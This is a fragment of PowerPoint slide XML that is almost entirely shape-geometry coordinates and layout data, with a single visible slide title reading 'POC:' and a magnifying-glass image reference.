              <a:gd name="connsiteY6" fmla="*/ 1508375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57420 h 1674498"/>
              <a:gd name="connsiteX1" fmla="*/ 411216 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1628370 h 1674498"/>
              <a:gd name="connsiteX2" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1569826 h 1674498"/>
              <a:gd name="connsiteX3" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1522494 h 1674498"/>
              <a:gd name="connsiteX4" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1514737 h 1674498"/>
              <a:gd name="connsiteX5" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1494730 h 1674498"/>
              <a:gd name="connsiteX6" fmla="*/ 1488946 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1508375 h 1674498"/>
              <a:gd name="connsiteX7" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1513599 h 1674498"/>
              <a:gd name="connsiteX8" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1497764 h 1674498"/>
              <a:gd name="connsiteX9" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1464331 h 1674498"/>
              <a:gd name="connsiteX10" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1409907 h 1674498"/>
              <a:gd name="connsiteX11" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1388540 h 1674498"/>
              <a:gd name="connsiteX12" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1372736 h 1674498"/>
              <a:gd name="connsiteX13" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1341971 h 1674498"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1347156 h 1674498"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1674498"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1674498"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1674498"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1674498"/>
              <a:gd name="connsiteX19" fmla="*/ 3261550 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1289117 h 1674498"/>
              <a:gd name="connsiteX20" fmla="*/ 3409554 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1258110 h 1674498"/>
              <a:gd name="connsiteX21" fmla="*/ 3534382 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1245916 h 1674498"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1674498"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1674498"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1674498"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1674498"/>
              <a:gd name="connsiteX26" fmla="*/ 4060534 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1273326 h 1674498"/>
              <a:gd name="connsiteX27" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1261726 h 1674498"/>
              <a:gd name="connsiteX28" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1265798 h 1674498"/>
              <a:gd name="connsiteX29" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1243899 h 1674498"/>
              <a:gd name="connsiteX30" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1204617 h 1674498"/>
              <a:gd name="connsiteX31" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1128278 h 1674498"/>
              <a:gd name="connsiteX32" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1091167 h 1674498"/>
              <a:gd name="connsiteX33" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1051509 h 1674498"/>
              <a:gd name="connsiteX34" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1053037 h 1674498"/>
              <a:gd name="connsiteX35" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051213 h 1674498"/>
              <a:gd name="connsiteX36" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1046878 h 1674498"/>
              <a:gd name="connsiteX37" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1043237 h 1674498"/>
              <a:gd name="connsiteX38" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1035396 h 1674498"/>
              <a:gd name="connsiteX39" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1019019 h 1674498"/>
              <a:gd name="connsiteX40" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 985341 h 1674498"/>
              <a:gd name="connsiteX41" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 902062 h 1674498"/>
              <a:gd name="connsiteX42" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 846132 h 1674498"/>
              <a:gd name="connsiteX43" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 781877 h 1674498"/>
              <a:gd name="connsiteX44" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 699758 h 1674498"/>
              <a:gd name="connsiteX45" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 640778 h 1674498"/>
              <a:gd name="connsiteX46" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 593682 h 1674498"/>
              <a:gd name="connsiteX47" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 531129 h 1674498"/>
              <a:gd name="connsiteX48" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 455936 h 1674498"/>
              <a:gd name="connsiteX49" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 409302 h 1674498"/>
              <a:gd name="connsiteX50" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 259259 h 1674498"/>
              <a:gd name="connsiteX51" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 208471 h 1674498"/>
              <a:gd name="connsiteX52" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 161973 h 1674498"/>
              <a:gd name="connsiteX53" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 152111 h 1674498"/>
              <a:gd name="connsiteX54" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 112232 h 1674498"/>
              <a:gd name="connsiteX55" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 37171 h 1674498"/>
              <a:gd name="connsiteX56" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 24074 h 1674498"/>
              <a:gd name="connsiteX57" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 0 h 1674498"/>
              <a:gd name="connsiteX58" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 0 h 1674498"/>
              <a:gd name="connsiteX59" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 1657420 h 1674498"/>
              <a:gd name="connsiteX0" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1657420 h 1657420"/>
              <a:gd name="connsiteX1" fmla="*/ 411216 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1628370 h 1657420"/>
              <a:gd name="connsiteX2" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1569826 h 1657420"/>
              <a:gd name="connsiteX3" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1522494 h 1657420"/>
              <a:gd name="connsiteX4" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1514737 h 1657420"/>
              <a:gd name="connsiteX5" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1494730 h 1657420"/>
              <a:gd name="connsiteX6" fmla="*/ 1488946 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1508375 h 1657420"/>
              <a:gd name="connsiteX7" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1513599 h 1657420"/>
              <a:gd name="connsiteX8" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1497764 h 1657420"/>
              <a:gd name="connsiteX9" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1464331 h 1657420"/>
              <a:gd name="connsiteX10" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1409907 h 1657420"/>
              <a:gd name="connsiteX11" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1388540 h 1657420"/>
              <a:gd name="connsiteX12" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1372736 h 1657420"/>
              <a:gd name="connsiteX13" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1341971 h 1657420"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1347156 h 1657420"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1657420"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1657420"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1657420"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1657420"/>
              <a:gd name="connsiteX19" fmla="*/ 3261550 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1289117 h 1657420"/>
              <a:gd name="connsiteX20" fmla="*/ 3409554 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1258110 h 1657420"/>
              <a:gd name="connsiteX21" fmla="*/ 3534382 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1245916 h 1657420"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1657420"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1657420"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1657420"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1657420"/>
              <a:gd name="connsiteX26" fmla="*/ 4060534 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1273326 h 1657420"/>
              <a:gd name="connsiteX27" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1261726 h 1657420"/>
              <a:gd name="connsiteX28" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1265798 h 1657420"/>
              <a:gd name="connsiteX29" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1243899 h 1657420"/>
              <a:gd name="connsiteX30" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1204617 h 1657420"/>
              <a:gd name="connsiteX31" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1128278 h 1657420"/>
              <a:gd name="connsiteX32" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1091167 h 1657420"/>
              <a:gd name="connsiteX33" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1051509 h 1657420"/>
              <a:gd name="connsiteX34" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1053037 h 1657420"/>
              <a:gd name="connsiteX35" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051213 h 1657420"/>
              <a:gd name="connsiteX36" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1046878 h 1657420"/>
              <a:gd name="connsiteX37" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1043237 h 1657420"/>
              <a:gd name="connsiteX38" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1035396 h 1657420"/>
              <a:gd name="connsiteX39" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1019019 h 1657420"/>
              <a:gd name="connsiteX40" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 985341 h 1657420"/>
              <a:gd name="connsiteX41" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 902062 h 1657420"/>
              <a:gd name="connsiteX42" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 846132 h 1657420"/>
              <a:gd name="connsiteX43" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 781877 h 1657420"/>
              <a:gd name="connsiteX44" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 699758 h 1657420"/>
              <a:gd name="connsiteX45" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 640778 h 1657420"/>
              <a:gd name="connsiteX46" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 593682 h 1657420"/>
              <a:gd name="connsiteX47" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 531129 h 1657420"/>
              <a:gd name="connsiteX48" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 455936 h 1657420"/>
              <a:gd name="connsiteX49" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 409302 h 1657420"/>
              <a:gd name="connsiteX50" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 259259 h 1657420"/>
              <a:gd name="connsiteX51" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 208471 h 1657420"/>
              <a:gd name="connsiteX52" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 161973 h 1657420"/>
              <a:gd name="connsiteX53" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 152111 h 1657420"/>
              <a:gd name="connsiteX54" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 112232 h 1657420"/>
              <a:gd name="connsiteX55" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 37171 h 1657420"/>
              <a:gd name="connsiteX56" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 24074 h 1657420"/>
              <a:gd name="connsiteX57" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 0 h 1657420"/>
              <a:gd name="connsiteX58" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 0 h 1657420"/>
              <a:gd name="connsiteX59" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 1657420 h 1657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288370" h="1657420">
                <a:moveTo>
                  <a:pt x="8158" y="1657420"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="61478" y="1649348"/>
                  <a:pt x="284901" y="1645343"/>
                  <a:pt x="411216" y="1628370"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="480417" y="1633188"/>
                  <a:pt x="558470" y="1603899"/>
                  <a:pt x="766051" y="1569826"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="812488" y="1564422"/>
                  <a:pt x="953443" y="1560007"/>
                  <a:pt x="971617" y="1522494"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1020161" y="1501878"/>
                  <a:pt x="1097347" y="1533665"/>
                  <a:pt x="1186668" y="1514737"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1339078" y="1494730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1488946" y="1508375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1604999" y="1513599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1717911" y="1497764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1743422" y="1488490"/>
                  <a:pt x="1730257" y="1478974"/>
                  <a:pt x="1794234" y="1464331"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1842539" y="1428781"/>
                  <a:pt x="1920661" y="1445458"/>
                  <a:pt x="2101780" y="1409907"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2138594" y="1385934"/>
                  <a:pt x="2193900" y="1407074"/>
                  <a:pt x="2244830" y="1388540"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2310706" y="1379336"/>
                  <a:pt x="2366733" y="1379060"/>
                  <a:pt x="2428648" y="1372736"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2495490" y="1364975"/>
                  <a:pt x="2599421" y="1346234"/>
                  <a:pt x="2645882" y="1341971"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2670920" y="1340537"/>
                  <a:pt x="2669117" y="1348484"/>
                  <a:pt x="2707413" y="1347156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2743721" y="1324535"/>
                  <a:pt x="2798213" y="1353269"/>
                  <a:pt x="2843134" y="1323561"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2859865" y="1315298"/>
                  <a:pt x="2912970" y="1306041"/>
                  <a:pt x="2923804" y="1314224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2935040" y="1314339"/>
                  <a:pt x="2947659" y="1308371"/>
                  <a:pt x="2953618" y="1318186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2963089" y="1329568"/>
                  <a:pt x="3000111" y="1302355"/>
                  <a:pt x="2995816" y="1318670"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3062330" y="1309669"/>
                  <a:pt x="3152963" y="1319665"/>
                  <a:pt x="3261550" y="1289117"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3409554" y="1258110"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3478041" y="1234777"/>
                  <a:pt x="3465895" y="1252355"/>
                  <a:pt x="3534382" y="1245916"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3568027" y="1248143"/>
                  <a:pt x="3669967" y="1235157"/>
                  <a:pt x="3707853" y="1241722"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3753776" y="1247777"/>
                  <a:pt x="3884527" y="1250073"/>
                  <a:pt x="3925616" y="1253751"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3936659" y="1256176"/>
                  <a:pt x="3949946" y="1252887"/>
                  <a:pt x="3954387" y="1263789"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3962052" y="1276954"/>
                  <a:pt x="4002445" y="1257743"/>
                  <a:pt x="3995849" y="1272939"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4024501" y="1259800"/>
                  <a:pt x="4037687" y="1266099"/>
                  <a:pt x="4060534" y="1273326"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4222834" y="1244527"/>
                  <a:pt x="4406167" y="1272716"/>
                  <a:pt x="4575478" y="1261726"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4650026" y="1265798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4792008" y="1243899"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4864797" y="1217989"/>
                  <a:pt x="4892960" y="1244893"/>
                  <a:pt x="4954126" y="1204617"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5072643" y="1179171"/>
                  <a:pt x="5136253" y="1145277"/>
                  <a:pt x="5309678" y="1128278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5365406" y="1122815"/>
                  <a:pt x="5419708" y="1103537"/>
                  <a:pt x="5474724" y="1091167"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5612132" y="1051509"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5662448" y="1045154"/>
                  <a:pt x="5747676" y="1053086"/>
                  <a:pt x="5776618" y="1053037"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5785786" y="1051213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5829381" y="1046878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5855683" y="1045549"/>
                  <a:pt x="5917537" y="1045151"/>
                  <a:pt x="5943596" y="1043237"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5955032" y="1029831"/>
                  <a:pt x="5969545" y="1030469"/>
                  <a:pt x="5985730" y="1035396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6020901" y="1022497"/>
                  <a:pt x="6059962" y="1025742"/>
                  <a:pt x="6103109" y="1019019"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6142495" y="996126"/>
                  <a:pt x="6176341" y="992625"/>
                  <a:pt x="6222406" y="985341"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6305000" y="965848"/>
                  <a:pt x="6389790" y="916113"/>
                  <a:pt x="6598672" y="902062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6696217" y="878308"/>
                  <a:pt x="6705019" y="864412"/>
                  <a:pt x="6766149" y="846132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6751303" y="824906"/>
                  <a:pt x="6844288" y="800250"/>
                  <a:pt x="6886312" y="781877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6904346" y="796722"/>
                  <a:pt x="6974811" y="693660"/>
                  <a:pt x="7006457" y="699758"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7015878" y="688760"/>
                  <a:pt x="7169942" y="678731"/>
                  <a:pt x="7231643" y="640778"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7291087" y="623099"/>
                  <a:pt x="7308597" y="611957"/>
                  <a:pt x="7363123" y="593682"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7401879" y="595559"/>
                  <a:pt x="7546060" y="516035"/>
                  <a:pt x="7588368" y="531129"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7589802" y="511039"/>
                  <a:pt x="7775022" y="480542"/>
                  <a:pt x="7782741" y="455936"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7843362" y="435631"/>
                  <a:pt x="7898455" y="431261"/>
                  <a:pt x="7952094" y="409302"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8005733" y="387343"/>
                  <a:pt x="8146910" y="289023"/>
                  <a:pt x="8231938" y="259259"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8305929" y="256630"/>
                  <a:pt x="8363222" y="225400"/>
                  <a:pt x="8428864" y="208471"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8491413" y="192972"/>
                  <a:pt x="8456819" y="173248"/>
                  <a:pt x="8616510" y="161973"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8658196" y="158015"/>
                  <a:pt x="8776576" y="160401"/>
                  <a:pt x="8826766" y="152111"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8917647" y="112232"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8976899" y="93075"/>
                  <a:pt x="9069756" y="89380"/>
                  <a:pt x="9182272" y="37171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9197307" y="35724"/>
                  <a:pt x="9214647" y="30863"/>
                  <a:pt x="9232990" y="24074"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9288370" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2719" y="557222"/>
                  <a:pt x="5439" y="1100198"/>
                  <a:pt x="8158" y="1657420"/>
                </a:cubicBez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>
            <a:innerShdw blurRad="63500" dist="12700" dir="54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3EB453-9544-4A06-87FD-B36D9426A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32" y="-128392"/>
            <a:ext cx="4559301" cy="1811740"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POC:</a:t>
            </a:r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93FFFF0-FE9D-4822-86FD-8592271DA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585" y="1105726"/>
            <a:ext cx="10940616" cy="532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768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EF32ACB-37F7-4E27-BDBC-67A94864F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4" descr="Magnifying glass on clear background">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C5943F8-7857-460E-BC74-0948323C4D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b="15589"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="-371074"/>
            <a:ext cx="12191980" cy="6869465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946391D-5DF8-4E8B-856D-1E0A178C3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09269" y="375267"/>
            <a:ext cx="6869465" cy="6096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  <a:gs pos="37000">
                <a:srgbClr val="000000">
                  <a:alpha val="4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3D3A9B8-C548-4A61-882F-0D6296319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246555" y="0"/>
            <a:ext cx="1945441" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst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06772 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2847273 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 593254 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2766463 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 613412 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 2731184 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 555080 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 2538816 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 525179 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 530521 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 2422066 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 533116 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 2358011 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 501423 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 2249479 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 486968 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 2182937 h 6858000"/>
